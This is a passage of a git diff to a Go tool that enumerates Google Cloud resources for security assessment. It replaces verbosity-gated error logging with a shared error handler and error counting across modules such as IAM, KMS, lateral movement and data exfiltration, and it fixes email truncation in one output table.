logger.ErrorM(fmt.Sprintf("Error listing buckets for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate storage buckets in project %s", projectID)) return } diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 5320d4f8..8a068f4c 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -99,9 +99,9 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger // Analyze cross-project bindings bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error analyzing cross-project access: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not analyze cross-project access") } else { m.CrossBindings = bindings } @@ -109,9 +109,9 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger // Get cross-project service accounts sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting cross-project service accounts: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not get cross-project service accounts") } else { m.CrossProjectSAs = sas } @@ -119,9 +119,9 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger // Find lateral movement paths paths, err := svc.FindLateralMovementPaths(m.ProjectIDs) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error finding lateral movement paths: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find lateral movement paths") } else { m.LateralMovementPaths = paths } diff --git a/gcp/commands/customroles.go b/gcp/commands/customroles.go index 762b5417..319257f1 100644 --- a/gcp/commands/customroles.go +++ b/gcp/commands/customroles.go @@ -123,9 +123,9 @@ func (m *CustomRolesModule) processProject(ctx context.Context, projectID string roles, err := svc.ListCustomRoles(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list custom roles in project %s: %v", projectID, err), globals.GCP_CUSTOMROLES_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CUSTOMROLES_MODULE_NAME, + fmt.Sprintf("Could not enumerate custom roles in project %s", projectID)) return } diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 8740a8f2..3138dba1 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -168,9 +168,9 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { computeService, err := compute.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating Compute service: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Compute service in project %s", projectID)) return } @@ -236,8 +236,10 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec return nil }) - if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing snapshots: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) } } @@ -310,8 +312,10 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID return nil }) - if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing images: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) } } @@ -319,18 +323,18 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) { storageService, err := storage.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating Storage service: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Storage service in project %s", projectID)) return } // List buckets resp, err := storageService.Buckets.List(projectID).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing buckets: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) return } diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index df0e2936..9111d21e 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -91,9 +91,9 @@ func (m *DataflowModule) processProject(ctx context.Context, projectID string, l svc := dataflowservice.New() jobs, err := svc.ListJobs(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Dataflow jobs: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAFLOW_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) return } diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index a9df3508..54415201 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -91,9 +91,9 @@ func (m *DataprocModule) processProject(ctx context.Context, projectID string, l clusters, err := svc.ListClusters(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Dataproc clusters: %v", err), globals.GCP_DATAPROC_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAPROC_MODULE_NAME, + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) return } diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index ccc55923..f578680c 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -132,9 +132,8 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger zones, err := ds.Zones(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating DNS zones in project %s: %v", projectID, err), globals.GCP_DNS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS zones in project %s", projectID)) return } @@ -147,9 +146,9 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger // Get records for each zone records, err := ds.Records(projectID, zone.Name) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating DNS records in zone %s: %v", zone.Name, err), globals.GCP_DNS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS records in zone %s", zone.Name)) continue } diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go index cda4a84d..9c0d748f 100644 --- a/gcp/commands/domainwidedelegation.go +++ b/gcp/commands/domainwidedelegation.go @@ -129,9 +129,9 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project svc := domainwidedelegationservice.New() accounts, err := svc.GetDWDServiceAccounts(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error checking project %s: %v", projectID, err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + fmt.Sprintf("Could not check DWD service accounts in project %s", projectID)) return } @@ -257,7 +257,11 @@ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger int if len(email) > 40 { parts := strings.Split(email, "@") if len(parts) == 2 { - email = parts[0][:15] + "...@" + parts[1] + username := parts[0] + if len(username) > 15 { + username = username[:15] + "..." + } + email = username + "@" + parts[1] } } diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index 2209f263..bce60026 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -140,9 +140,8 @@ func (m *EndpointsModule) processProject(ctx context.Context, projectID string, computeSvc, err := networkSvc.GetComputeService(ctx) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating compute service for project %s: %v", projectID, err), globals.GCP_ENDPOINTS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_ENDPOINTS_MODULE_NAME, + fmt.Sprintf("Could not create compute service in project %s", projectID)) return } diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index 85c3d4f5..adffca33 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -67,9 +67,9 @@ func (m *FilestoreModule) processProject(ctx context.Context, projectID string, svc := filestoreservice.New() instances, err := svc.ListInstances(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Filestore instances: %v", err), globals.GCP_FILESTORE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FILESTORE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Filestore instances in project %s", projectID)) return } diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 923c79fa..6e6e3510 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -146,9 +146,8 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l networks, err := ns.Networks(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating networks in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate networks in project %s", projectID)) } else { m.mu.Lock() m.Networks = append(m.Networks, networks...) @@ -162,9 +161,8 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l subnets, err := ns.Subnets(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating subnets in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) } else { m.mu.Lock() m.Subnets = append(m.Subnets, subnets...) @@ -175,9 +173,8 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l rules, err := ns.FirewallRulesEnhanced(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating firewall rules in project %s: %v", projectID, err), globals.GCP_FIREWALL_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) } else { m.mu.Lock() m.FirewallRules = append(m.FirewallRules, rules...) diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index b5a58ea6..59a926b0 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -125,9 +125,8 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, functions, err := fs.Functions(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating functions in project %s: %v", projectID, err), globals.GCP_FUNCTIONS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_FUNCTIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate functions in project %s", projectID)) return } diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 19683311..64e3b5e3 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -141,9 +141,8 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger clusters, nodePools, err := gs.Clusters(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating GKE in project %s: %v", projectID, err), globals.GCP_GKE_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_GKE_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) return } diff --git a/gcp/commands/hmackeys.go b/gcp/commands/hmackeys.go index 8b87738a..bc231280 100644 --- a/gcp/commands/hmackeys.go +++ b/gcp/commands/hmackeys.go @@ -91,9 +91,8 @@ func (m *HMACKeysModule) processProject(ctx context.Context, projectID string, l keys, err := svc.ListHMACKeys(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating HMAC keys in project %s: %v", projectID, err), globals.GCP_HMACKEYS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_HMACKEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) return } diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 5135d64a..197eacbb 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -163,9 +163,8 @@ func (m *IAMModule) processProject(ctx context.Context, projectID string, logger iamData, err := iamService.CombinedIAM(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating IAM in project %s: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM in project %s", projectID)) return } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index dee8aceb..042e5393 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -80,9 +80,9 @@ func (m *IAPModule) processProject(ctx context.Context, projectID string, logger // Get tunnel destination groups groups, err := svc.ListTunnelDestGroups(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list IAP tunnel groups: %v", err), globals.GCP_IAP_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAP_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) } else { m.mu.Lock() m.TunnelDestGroups = append(m.TunnelDestGroups, groups...) diff --git a/gcp/commands/identityprotection.go b/gcp/commands/identityprotection.go index 99c0345c..cbfb1159 100644 --- a/gcp/commands/identityprotection.go +++ b/gcp/commands/identityprotection.go @@ -246,9 +246,9 @@ func (m *IdentityProtectionModule) analyzeIAMPolicy(ctx context.Context, project // Get IAM policy for the project policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting IAM policy for project %s: %v", projectID, err), GCP_IDENTITYPROTECTION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_IDENTITYPROTECTION_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for project %s", projectID)) return } @@ -373,9 +373,9 @@ func (m *IdentityProtectionModule) analyzeServiceAccounts(ctx context.Context, p // List service accounts saList, err := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing service accounts for project %s: %v", projectID, err), GCP_IDENTITYPROTECTION_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_IDENTITYPROTECTION_MODULE_NAME, + fmt.Sprintf("Could not list service accounts for project %s", projectID)) return } diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 94d2bff2..a875db79 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -123,9 +123,8 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, instances, projectMeta, err := ces.InstancesWithMetadata(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating instances in project %s: %v", projectID, err), globals.GCP_INSTANCES_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_INSTANCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate instances in project %s", projectID)) return } diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index fa50e38c..af2aea7b 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -137,9 +137,8 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger keyRings, err := ks.KeyRings(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating KMS key rings in project %s: %v", projectID, err), globals.GCP_KMS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS key rings in project %s", projectID)) return } @@ -151,9 +150,8 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger keys, err := ks.CryptoKeys(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating KMS keys in project %s: %v", projectID, err), globals.GCP_KMS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) } else { m.mu.Lock() m.CryptoKeys = append(m.CryptoKeys, keys...) diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index e878e866..77a6500b 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -174,9 +174,9 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro // Get all service accounts serviceAccounts, err := iamService.ServiceAccounts(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting service accounts: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get service accounts in project %s", projectID)) return } @@ -297,9 +297,9 @@ func (m *LateralMovementModule) findCrossProjectAccess(ctx context.Context, proj // Get IAM policy for the project using PoliciesWithInheritance for comprehensive view bindings, err := iamService.PoliciesWithInheritance(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting IAM policy: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for project %s", projectID)) return } diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index 1c55b258..e239d80e 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -92,9 +92,9 @@ func (m *LoadBalancersModule) processProject(ctx context.Context, projectID stri // Get load balancers lbs, err := svc.ListLoadBalancers(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list load balancers: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list load balancers in project %s", projectID)) } else { m.mu.Lock() m.LoadBalancers = append(m.LoadBalancers, lbs...) diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index a5a3fa53..2abda159 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -133,9 +133,8 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo sinks, err := ls.Sinks(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating logging sinks in project %s: %v", projectID, err), globals.GCP_LOGGING_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) } else { m.mu.Lock() m.Sinks = append(m.Sinks, sinks...) @@ -149,9 +148,8 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo metrics, err := ls.Metrics(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating log metrics in project %s: %v", projectID, err), globals.GCP_LOGGING_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) } else { m.mu.Lock() m.Metrics = append(m.Metrics, metrics...) diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go index e5996d4a..57290bc4 100644 --- a/gcp/commands/logginggaps.go +++ b/gcp/commands/logginggaps.go @@ -130,9 +130,9 @@ func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string svc := logginggapsservice.New() gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error scanning project %s: %v", projectID, err), globals.GCP_LOGGINGGAPS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGGAPS_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) return } diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 46420a17..69ee5ad1 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -87,9 +87,9 @@ func (m *MemorystoreModule) processProject(ctx context.Context, projectID string svc := memorystoreservice.New() instances, err := svc.ListRedisInstances(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Redis instances: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_MEMORYSTORE_MODULE_NAME, + fmt.Sprintf("Could not list Redis instances in project %s", projectID)) return } diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 4afe68c9..262e3b5e 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -271,9 +271,9 @@ func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, pro break } if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing alert policies for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate alert policies in project %s", projectID)) break } @@ -365,9 +365,9 @@ func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Conte break } if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing notification channels for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate notification channels in project %s", projectID)) break } @@ -417,9 +417,9 @@ func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, proj break } if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing uptime checks for project %s: %v", projectID, err), GCP_MONITORINGALERTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate uptime checks in project %s", projectID)) break } diff --git a/gcp/commands/networkendpoints.go b/gcp/commands/networkendpoints.go index 0a072677..92006252 100644 --- a/gcp/commands/networkendpoints.go +++ b/gcp/commands/networkendpoints.go @@ -124,25 +124,25 @@ func (m *NetworkEndpointsModule) processProject(ctx context.Context, projectID s // Get PSC endpoints pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting PSC endpoints for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) } // Get private connections privateConns, err := svc.GetPrivateConnections(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting private connections for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, + fmt.Sprintf("Could not get private connections in project %s", projectID)) } // Get service attachments attachments, err := svc.GetServiceAttachments(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting service attachments for %s: %v", projectID, err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, + fmt.Sprintf("Could not get service attachments in project %s", projectID)) } m.mu.Lock() diff --git a/gcp/commands/networkexposure.go b/gcp/commands/networkexposure.go index 2a1c9f5d..c45934c2 100644 --- a/gcp/commands/networkexposure.go +++ b/gcp/commands/networkexposure.go @@ -187,9 +187,9 @@ func (m *NetworkExposureModule) processProject(ctx context.Context, projectID st func (m *NetworkExposureModule) findExposedInstances(ctx context.Context, projectID string, logger internal.Logger) { computeService, err := compute.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating Compute service: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not create Compute service in project %s", projectID)) return } @@ -237,9 +237,9 @@ func (m *NetworkExposureModule) findExposedInstances(ctx context.Context, projec }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing instances: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not list instances in project %s", projectID)) } } @@ -285,8 +285,10 @@ func (m *NetworkExposureModule) findExposedLoadBalancers(ctx context.Context, pr return nil }) - if err 